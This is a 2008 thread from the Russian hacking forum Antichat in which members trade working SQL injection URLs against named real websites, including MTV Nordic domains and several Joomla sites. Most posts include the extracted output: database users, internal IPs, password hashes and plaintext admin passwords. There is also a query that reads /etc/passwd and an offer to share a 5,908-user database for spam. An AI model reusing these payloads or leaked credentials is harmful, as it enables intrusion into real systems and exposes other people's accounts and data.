HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 29.06.2008, 01:32
nex0
Познающий
Регистрация: 06.11.2007
Сообщений: 57
Провел на форуме:
2688963

Репутация: 272
Отправить сообщение для nex0 с помощью ICQ
По умолчанию

mtv.se
Код:
http://www.mtv.se/common/mediaplayer/playMedia_big2.php?TrackId=99999+union+select+1111,concat_ws(0x3a,version(),user(),database()),3333,4444/*&ArticleId=4845
mtve.com
Код:
http://www.mtve.com/common/mediaplayer/playMedia_big2.php?TrackId=99999+union+select+1111,concat_ws(0x3a,version(),user(),database()),3333,4444/*&ArticleId=4845
mtv.no
Код:
http://www.mtv.no/common/mediaplayer/playMedia_big2.php?TrackId=99999+union+select+1111,concat_ws(0x3a,version(),user(),database()),3333,4444/*&ArticleId=4845
mtv.dk
Код:
http://www.mtv.dk/common/mediaplayer/playMedia_big2.php?TrackId=99999+union+select+1111,concat_ws(0x3a,version(),user(),database()),3333,4444/*&ArticleId=4845
musictelevision.fi
Код:
http://www.musictelevision.fi/common/mediaplayer/playMedia_big2.php?TrackId=99999+union+select+1111,concat_ws(0x3a,version(),user(),database()),3333,4444/*&ArticleId=4845
ко всем одно
5.0.37-log:mtvnordicadmin@172.23.59.249:mtvnordic
 
Ответить с цитированием

  #2  
Старый 29.06.2008, 01:55
~!DoK_tOR!~
Banned
Регистрация: 10.11.2006
Сообщений: 829
Провел на форуме:
2634544

Репутация: 1559


Отправить сообщение для ~!DoK_tOR!~ с помощью ICQ
По умолчанию

Цитата:
Сообщение от nex0  
mtv.se
Код:
http://www.mtv.se/common/mediaplayer/playMedia_big2.php?TrackId=99999+union+select+1111,concat_ws(0x3a,version(),user(),database()),3333,4444/*&ArticleId=4845
mtve.com
Код:
http://www.mtve.com/common/mediaplayer/playMedia_big2.php?TrackId=99999+union+select+1111,concat_ws(0x3a,version(),user(),database()),3333,4444/*&ArticleId=4845
mtv.no
Код:
http://www.mtv.no/common/mediaplayer/playMedia_big2.php?TrackId=99999+union+select+1111,concat_ws(0x3a,version(),user(),database()),3333,4444/*&ArticleId=4845
mtv.dk
Код:
http://www.mtv.dk/common/mediaplayer/playMedia_big2.php?TrackId=99999+union+select+1111,concat_ws(0x3a,version(),user(),database()),3333,4444/*&ArticleId=4845
musictelevision.fi
Код:
http://www.musictelevision.fi/common/mediaplayer/playMedia_big2.php?TrackId=99999+union+select+1111,concat_ws(0x3a,version(),user(),database()),3333,4444/*&ArticleId=4845
ко всем одно
5.0.37-log:mtvnordicadmin@172.23.59.249:mtvnordic
Цитата:
http://www.mtv.se/common/mediaplayer/playMedia_big2.php?TrackId=-1+union+select+1,2,concat_ws(0x3a,user,password),4 +from+mysql.user/*
root:0fdf9cda19d19c10

Цитата:
http://www.mtv.se/common/mediaplayer/playMedia_big2.php?TrackId=-1+union+select+1,2,LOAD_FILE(CHAR(47,101,116,99,47 ,112,97,115,115,119,100)),4/*
в исходнике )

Последний раз редактировалось ~!DoK_tOR!~; 29.06.2008 в 01:58..
 
Ответить с цитированием

  #3  
Старый 29.06.2008, 02:04
159932
Постоянный
Регистрация: 28.09.2007
Сообщений: 820
Провел на форуме:
6722038

Репутация: 1385


По умолчанию

Цитата:
http://www.mtv.dk/common/mediaplayer/playMedia_big2.php?TrackId=99999+union+select+1,co ncat_ws(0x3a,username,password),3,4+from+baltic_ph pmotion.admin/*
admin:adminpass
Цитата:
http://www.mtv.dk/common/mediaplayer/playMedia_big2.php?TrackId=99999+union+select+1,co ncat_ws(0x3a,user_name,password),3,4+from+baltic_p hpmotion.member_profile/*
Цитата:
http://www.mtv.dk/common/mediaplayer/playMedia_big2.php?TrackId=99999+union+select+1,co ncat_ws(0x3a,username,password),3,4+from+fiat.user s+limit+0,1/*
admin:25e4ee4e9229397b6b17776bfceaf8e7:adminpass
Цитата:
http://www.mtv.dk/common/mediaplayer/playMedia_big2.php?TrackId=99999+union+select+1,co ncat_ws(0x3a,login,password),3,4+from+gudrumogidas .gidas_cms_users+limit+0,1
admin:indigovaldas
кароче там очень много всего можно найти .. лень .. основное есть ..
там только 60 табл в которых есть колонка password
 
Ответить с цитированием

  #4  
Старый 29.06.2008, 02:50
swt1
Постоянный
Регистрация: 16.02.2008
Сообщений: 395
Провел на форуме:
3370466

Репутация: 96
По умолчанию

http://zito.mvs.gov.ua/?page=3&id=-639+union+select+1,2,3,4,5,6,7/*
 
Ответить с цитированием

  #5  
Старый 29.06.2008, 06:00
Petr
Banned
Регистрация: 10.06.2006
Сообщений: 938
Провел на форуме:
7792614

Репутация: 1223


По умолчанию

http://www.bocharik.ru/tv/index.php?id=-4+UNION+SELECT+1,2,3,4,5/*

Админка
http://www.bocharik.ru/admin

Версия
http://www.bocharik.ru/tv/index.php?id=-4+UNION+SELECT+1,2,3,convert(version()+using+koi8r ),5/*

Юзер
http://www.bocharik.ru/tv/index.php?id=-4+UNION+SELECT+1,2,3,convert(user()+using+koi8r),5/*

Имя бд
http://www.bocharik.ru/tv/index.php?id=-4+UNION+SELECT+1,2,3,convert(DATABASE()+using+koi8 r),5/*


Спасибо, nex0 je0n

http://www.bocharik.ru/tv/index.php?id=-4+UNION+SELECT+1,2,3,convert(concat_ws(0x3a,userna me,user_password)+using+koi8r),5+from+phpbb_users+ where+user_level=1+limit+0,1/*
/admin/ - пасс от форума,которого нет, подойдет к админке
Bocharik:94edcb5a40e5cb07f1428ded09fc62b7:gjlpfvrj v
to /admin/ - admin:gjlpfvrjv

Последний раз редактировалось Sandjuro; 15.07.2008 в 04:34..
 
Ответить с цитированием

  #6  
Старый 29.06.2008, 07:18
gisTy
Постоянный
Регистрация: 24.05.2008
Сообщений: 589
Провел на форуме:
3629857

Репутация: 504


По умолчанию

PR 2
Цитата:
http://jptweb.com/projects/index.php?option=com_jabode&task=sign&sign=leo&id=-4+union+select+1,2,3,4,concat_ws(0x3a3a,version(), user(),database())/*
version(): 5.0.24a-standard-log
user(): jpthome@lankershim.dreamhost.com
database(): jpthome

Цитата:
http://jptweb.com/projects/index.php?option=com_jabode&task=sign&sign=leo&id=-4+union+select+null,2,3,4,concat(username,0x3a,pas sword)+from+jos_users/*
admin:9b9b2642fd71dc42744cba369fb22120


PR 2
Цитата:
http://www.pinkladylegend.com/index.php?option=com_jabode&task=sign&sign=taurus& id=-3+union+select+1,2,3,4,concat_ws(0x3a3a,version(), user(),database())--&Itemid=3
version(): 5.0.58
user(): pinklady@localhost
database(): pinklady

Цитата:
http://www.pinkladylegend.com/index.php?option=com_jabode&task=sign&sign=taurus& id=-3+union+select+1,2,3,4,concat(username,0x3a,passwo rd)+FROM+jos_users--&Itemid=3
admin:9f751204e5080f66b7c5d77c0791ca8d:3wmSYj6vHBR kaick


PR 2
Цитата:
http://www.l2u.co.uk/index.php?option=com_jabode&task=sign&sign=leo&id=-2+union+select+1,2,3,4,concat_ws(0x3a3a,version(), user(),database())&Itemid=151
version(): 4.1.20-community-nt
user(): locallytoyou@localhost
database(): locallytoyou



PR 2
Цитата:
http://soulwithstyle.com/index.php?option=com_jabode&task=sign&sign=leo&id=-4+union+select+1,2,3,4,concat_ws(0x3a3a,version(), user(),database())--
version(): 5.0.24a-standard-log
user(): soul@apache2-cabo.fiero.dreamhost.com
database(): soul

Цитата:
http://soulwithstyle.com/index.php?option=com_jabode&task=sign&sign=leo&id=-4+union+select+1,2,3,4,concat(username,0x3a,passwo rd)+from+jos_users--
admin:0f138c43fd44179b1380f1f0aaf88e3c:NGLGxwIecZY qjkOM


PR 0 ='(
Цитата:
http://charlestownalumni.net/cms/index.php?option=com_jabode&task=sign&sign=caprico rn&id=-4+union+select+1,2,3,4,concat_ws(0x3a3a,version(), user(),database())--
version(): 4.1.22-standard
user(): chsalum_joom1@localhost
database(): chsalum_joom1

Цитата:
http://charlestownalumni.net/cms/index.php?option=com_jabode&task=sign&sign=caprico rn&id=-4+union+select+1,2,3,4,concat(username,0x3a,passwo rd)+FROM+jos_users--
chsalum:7e027f88756af54c4e987d13395b7fbf:ZjMUi8erH WoIxFey


PR 0 ='(
Цитата:
http://www.latvianusa.com/index.php?option=com_jabode&task=sign&sign=sagitta rius&id=-1+union+select+1,2,3,4,concat_ws(0x3a3a,version(), user(),database())--&Itemid=999
version(): 4.1.22-standard
user(): latvianu_jUser@localhost
database(): latvianu_joomlaDB
 
Ответить с цитированием

  #7  
Старый 29.06.2008, 09:10
n3m0
Участник форума
Регистрация: 11.05.2007
Сообщений: 149
Провел на форуме:
6373157

Репутация: 247
Отправить сообщение для n3m0 с помощью ICQ
По умолчанию

PR 0

Цитата:
http://jacellular.com/main/index.php?option=com_jabode&task=sign&sign=cancer& id=-4+union+select+1,2,3,4,concat_ws(0x3a3a,version(), %20user(),database())--

version()
: 5.0.45-community-log
user() : jacellul_joom1@localhost
database() : jacellul_joom1

thnx to gisTy
 
Ответить с цитированием

  #8  
Старый 29.06.2008, 21:56
last_root
Участник форума
Регистрация: 24.06.2008
Сообщений: 235
Провел на форуме:
573676

Репутация: 113
Отправить сообщение для last_root с помощью ICQ
По умолчанию

Код:
 http://www.bedro1075.co.kr/bbs1/login.php?id=issue&page=1&sn1=&divpage=1&sn=off&ss=on&sc=on&select_arrange=headnum&desc=asc&s_url=%2Fbbs1%2Fview.php%3Fid%3Dissue%26no%3D2
дальше не знаю как- я еще ток начал....
 
Ответить с цитированием

  #9  
Старый 29.06.2008, 21:35
SUBJECT617
Познающий
Регистрация: 06.08.2007
Сообщений: 85
Провел на форуме:
1695462

Репутация: 91
Отправить сообщение для SUBJECT617 с помощью ICQ
По умолчанию

Цитата:
http://cjcity.ru/base/song.php?id=1'+UNION+SELECT+1,2,3,concat_ws(0x3a,u sername,password,icq,email),5+from+users/*
Лиса аж подвисла ненадолго от кол-ва или хз от чего =)

Если кому уж очень надо эту базу(5908 юзверей) (для спама или вообще хз для чего) то просто стукните в личку я скину в .txt... Ну думаю никому и не надо
 
Ответить с цитированием

  #10  
Старый 29.06.2008, 21:44
Buffalon
Постоянный
Регистрация: 22.03.2008
Сообщений: 325
Провел на форуме:
1208132

Репутация: 63
По умолчанию

http://www.rgufk.ru/modules/sections/index.php?op=viewarticle&artid=148+and+1=2+union+s elect+1,2,version(),4,5,user(),7,8,9,10
cпс jokester
НИмогу капнутЬ дальше
version(): 4.1.21
user() :rgufk@localhost
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ